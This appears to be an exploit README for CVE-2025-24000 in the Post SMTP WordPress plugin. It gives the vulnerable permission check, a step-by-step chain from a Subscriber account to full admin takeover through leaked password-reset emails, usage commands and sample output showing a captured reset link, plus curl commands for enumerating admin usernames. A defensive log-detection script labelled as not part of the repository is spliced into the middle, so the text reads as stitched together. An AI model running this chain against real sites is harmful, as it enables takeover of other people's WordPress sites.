## https://sploitus.com/exploit?id=00B103F8-BE7C-5681-9040-F6DCA403D67B
# CVE-2025-24000 - Post SMTP Privilege Escalation Exploit
## Overview
This script exploits **CVE-2025-24000**, a high-severity broken access control vulnerability in the **Post SMTP WordPress plugin** (versions ≤ 3.2.0). It allows any authenticated user with a low-privilege account (e.g. Subscriber) to access the plugin's REST API email logs, steal an admin password reset link, and take over the administrator account.
- **CVE:** CVE-2025-24000
- **Plugin:** Post SMTP (WPExperts)
- **Affected versions:** ≤ 3.2.0
- **Fixed in:** 3.3.0
- **CVSS Score:** 8.8 (High)
- **Impact:** Privilege Escalation → Full Admin Account Takeover
---
## How It Works
The vulnerability stems from a flawed permission check in the plugin's REST API:
```php
// Vulnerable code (≤ 3.2.0): the permission callback only checks that a
// session exists, not that the caller holds an administrative capability.
public function get_logs_permission() {
    return is_user_logged_in();
}
```
Any logged-in user, regardless of role, can access endpoints intended for administrators only:
- `GET /wp-json/psd/v1/get-logs`
- `GET /wp-json/psd/v1/get-details?id=&type=show_view`
- `POST /wp-json/psd/v1/resend-email`
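As an added defensive example (not part of this repository), the following Python flags requests to the Post SMTP log endpoints listed above in web-server access logs, and the reset-then-read sequence the exploit chain produces. The combined log format regex is an assumption about your server's log layout; the log lines, IPs and `id` value are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format (assumption about the server's log layout); path keeps the query string.
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Post SMTP log endpoints named in this advisory, in pretty-permalink and ?rest_route= form.
PSD_RE = re.compile(r'(?:/wp-json/psd/v1/|rest_route=/psd/v1/)(?P<ep>get-logs|get-details|resend-email)')
RESET_RE = re.compile(r'/wp-login\.php\?action=lostpassword')

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def find_log_access(lines):
    """Every request to a Post SMTP log endpoint as (ip, endpoint, status)."""
    hits = []
    for rec in filter(None, map(parse, lines)):
        m = PSD_RE.search(rec["path"])
        if m:
            hits.append((rec["ip"], m.group("ep"), rec["status"]))
    return hits

def find_reset_then_read(lines, window=timedelta(minutes=10)):
    """IPs that POST a password reset and then read the mail log within `window` (the chain's signature)."""
    resets, flagged = defaultdict(list), set()
    for rec in filter(None, map(parse, lines)):
        if rec["method"] == "POST" and RESET_RE.search(rec["path"]):
            resets[rec["ip"]].append(rec["ts"])
        elif PSD_RE.search(rec["path"]) and any(
                timedelta(0) <= rec["ts"] - t <= window for t in resets[rec["ip"]]):
            flagged.add(rec["ip"])
    return sorted(flagged)

# Constructed sample log (RFC 5737 test addresses); the id value is made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Aug/2025:12:00:05 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0',
    '203.0.113.7 - - [10/Aug/2025:12:00:09 +0000] "GET /wp-json/psd/v1/get-logs HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Aug/2025:12:00:12 +0000] "GET /wp-json/psd/v1/get-details?id=17&type=show_view HTTP/1.1" 200 4096',
    '198.51.100.2 - - [10/Aug/2025:12:30:00 +0000] "GET /index.php?rest_route=/psd/v1/get-logs HTTP/1.1" 401 0',
    '192.0.2.9 - - [10/Aug/2025:13:00:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, ep, status in find_log_access(SAMPLE_LOG):
        print(f"psd endpoint {ep} from {ip} -> {status}")
    print("reset-then-read from:", find_reset_then_read(SAMPLE_LOG))
```

A 200 on these endpoints from a non-administrator session is the indicator on unpatched sites; after 3.3.0 such requests should return 401/403.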
### Exploit Chain
1. Register or use an existing low-privilege WordPress account (Subscriber)
2. Log in and obtain a WP REST nonce from `/wp-admin/`
3. Trigger a password reset for the admin account
4. Read the email logs via the unprotected REST API
5. Extract the password reset link from the log
6. Use the reset link to set a new admin password
7. Log into `/wp-admin` as administrator
---
## Requirements
- Python 3.x
- `requests` library (`pip install requests`)
- A registered account on the target WordPress site (Subscriber level is enough)
---
## Usage
```bash
python3 exploit_cve_2025_24000.py \
  --url <URL> \
  --username <USERNAME> \
  --password <PASSWORD> \
  --email <ADMIN_USERNAME_OR_EMAIL>
```
### Arguments
| Argument | Description |
|---|---|
| `--url` | Base URL of the WordPress site (e.g. `http://target.local/wordpress/`) |
| `--username` | Your low-privilege WordPress username |
| `--password` | Your low-privilege WordPress password |
| `--email` | Admin username or email to reset |
### Example
```bash
python3 exploit_cve_2025_24000.py \
  --url http://samurai.local/samurai/ \
  --username attacker \
  --password Password1 \
  --email shogun
```
### Expected Output
```
[*] Logging in as attacker...
[+] Logged in successfully as attacker
[*] Fetching WP REST nonce from wp-admin...
[+] Got nonce: a5f398e081
[*] Triggering password reset for: shogun
[+] Password reset triggered.
[*] Fetching email logs...
[+] Got logs response.
[*] Checking 1 email(s) for reset link...
[+] RESET LINK FOUND:
http://samurai.local/samurai/wp-login.php?action=rp&key=XXXXXXXXXXXX&login=shogun
[*] Visit the link above to set a new admin password and take over the site.
```
---
## Tips
- If the admin username is unknown, enumerate it via the WP REST API:
  ```bash
  curl -s 'http://target.local/wp-json/wp/v2/users' | python3 -m json.tool
  ```
  Or via author enumeration:
  ```bash
  curl -s 'http://target.local/?author=1' -I | grep -i location
  ```
- The reset link is single-use and expires; use it immediately after extraction
- If logs are empty, make sure the site is configured to send mail through Post SMTP (not PHP mail)
---
## References
- **Patchstack Advisory:** https://patchstack.com/database/wordpress/plugin/post-smtp/vulnerability/wordpress-post-smtp-3-2-0-privilege-escalation-vulnerability
- **GitHub Advisory:** https://github.com/advisories/GHSA-2fgh-78wf-f9v9
- **Reproduction Walkthrough:** https://medium.com/@security_56355/from-subscriber-to-admin-reproducing-cve-2025-24000-in-wordpress-post-smtp-plugin-8105ff85e274
- **NVD:** https://nvd.nist.gov/vuln/detail/CVE-2025-24000
---
## Disclaimer
This tool is intended for authorized penetration testing and educational purposes only. Do not use against systems you do not have explicit permission to test.